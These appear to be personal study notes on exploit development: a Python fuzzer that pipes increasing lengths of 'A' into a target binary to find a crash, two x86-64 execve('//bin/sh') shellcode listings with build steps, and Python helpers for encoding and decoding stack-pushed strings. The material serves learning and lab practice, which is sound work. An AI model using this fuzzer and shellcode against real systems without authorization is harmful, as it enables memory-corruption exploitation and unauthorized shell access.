import os

for i in range(500, 1000, 1):
    cmd = ("python -c \"print('A' * %d)\"" % i)   # emit i bytes of 'A'
    print("fuzzing length %d" % i)
    os.system("%s | ./vulnapp" % cmd)             # pipe them into the target's stdin
notes:
this passes AAAAA... with the length stepping through 500, 501, 502, ... all the way to 1000
and just watches for the input length at which the program segfaults
Wednesday, March 11, 2020
Tuesday, March 10, 2020
shellcode in ASM to C program examples
not optimized for shortness
does not remove null (00) characters
--------
using push
--------
section .text
global _start
_start:
    xor rdi, rdi                    ; null qword to terminate the string
    push rdi
    mov rdi, 0x68732f6e69622f2f     ; "//bin/sh" as a little-endian qword
    push rdi
    mov rdi, rsp                    ; filename = pointer to the string on the stack
    mov rsi, 0                      ; argv = NULL
    mov rdx, 0                      ; envp = NULL
    mov rax, 59                     ; execve syscall number
    syscall
--------
using data
--------
section .data
sh: db "//bin/sh", 0                ; NUL-terminated so execve sees the end of the path
section .text
global _start
_start:
    mov rdi, sh                     ; filename = address of the string in .data
    mov rsi, 0                      ; argv = NULL
    mov rdx, 0                      ; envp = NULL
    mov rax, 59                     ; execve syscall number
    syscall
------
to compile
------
$> nasm -f elf64 mycode.asm -o mycode.o
$> ld mycode.o -o mycode
$> ./mycode
# whoami
root
Convert String to Shell Code Hex in Python
if you want //bin/sh to become hex you can use in assembly for shellcode:
>>> import re, binascii
>>> for word in re.findall(".{8}", binascii.hexlify("//bin/sh".encode()).decode()):
...     byte = re.findall(".{2}", word)              # split the 8 hex digits into 4 byte pairs
...     cmd = ""
...     for index in range(len(byte)-1, -1, -1):     # walk the bytes backwards (little-endian)
...         cmd = cmd + byte[index]
...     print("push 0x%s" % cmd)
...
push 0x69622f2f
push 0x68732f6e
side notes
binascii.hexlify converts the encoded bytes to a hex string
re.findall(".{8}", ...) finds the words (8 hex digits = 4 bytes each)
re.findall(".{2}", ...) finds the bytes (2 hex digits each)
range(..., ..., -1) loops through the bytes in each word backwards (little-endianness)
cmd = cmd + ... rebuilds the hex in the order the CPU expects in the immediate
Decode ShellCode String in Python
if you see this
push 0x68732f2f
push 0x6e69622f
it may be a string
you can use python 3 to decode and see
>>> import binascii
>>> binascii.unhexlify("68732f2f").decode()[::-1]
'//sh'
>>> binascii.unhexlify("6e69622f").decode()[::-1]
'/bin'
yep! shellcode
//sh/bin
(read in push order; since the stack grows downward the last push lands at the lowest address, so in memory the string is /bin//sh)
side note:
binascii.unhexlify was used to convert the hex to bytes
decode() was used to convert the bytes to a string
[::-1] was used to reverse the string's characters
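The two one-liners above (string to push immediates, and push immediates back to a string) combined into reusable functions, added here as an example and not code from the original posts. It emits the words in the order they must be pushed, accepts a word size of 4 (x86 push imm32) or 8 (the qword the x86-64 example loads into rdi), and flags words that would put 00 bytes into the shellcode.

```python
import binascii
import struct


def string_to_pushes(s, word_size=4):
    """Return the immediates that push `s` onto the stack, in push order.

    The string is front-padded with '/' (harmless in a path, which is why
    the shellcode above uses "//bin/sh") so its length is a multiple of the
    word size and no NUL bytes are introduced.  Each word is read as a
    little-endian integer, and the list is reversed because the stack grows
    downward: the last push ends up at the lowest address, the string start.
    """
    data = s.encode()
    data = b"/" * (-len(data) % word_size) + data
    fmt = "<I" if word_size == 4 else "<Q"
    words = [struct.unpack(fmt, data[i:i + word_size])[0]
             for i in range(0, len(data), word_size)]
    return ["0x%0*x" % (word_size * 2, w) for w in reversed(words)]


def _word_bytes(h, word_size):
    """Hex immediate (with or without 0x) -> the bytes as they sit in memory."""
    h = h[2:] if h.lower().startswith("0x") else h
    return binascii.unhexlify(h.rjust(word_size * 2, "0"))[::-1]


def pushes_to_string(immediates, word_size=4):
    """Inverse of string_to_pushes: rebuild the string as it lies in memory.

    Undo the push order first, then undo the byte swap of each word, which
    is what unhexlify(...)[::-1] above does for a single word.
    """
    chunks = [_word_bytes(h, word_size) for h in reversed(immediates)]
    return b"".join(chunks).rstrip(b"\x00").decode()


def words_with_nulls(immediates, word_size=4):
    """List the immediates that would put a 00 byte into the shellcode."""
    return [h for h in immediates if b"\x00" in _word_bytes(h, word_size)]


if __name__ == "__main__":
    for imm in string_to_pushes("/bin/sh"):
        print("push %s" % imm)
    print(pushes_to_string(["0x68732f2f", "0x6e69622f"]))
```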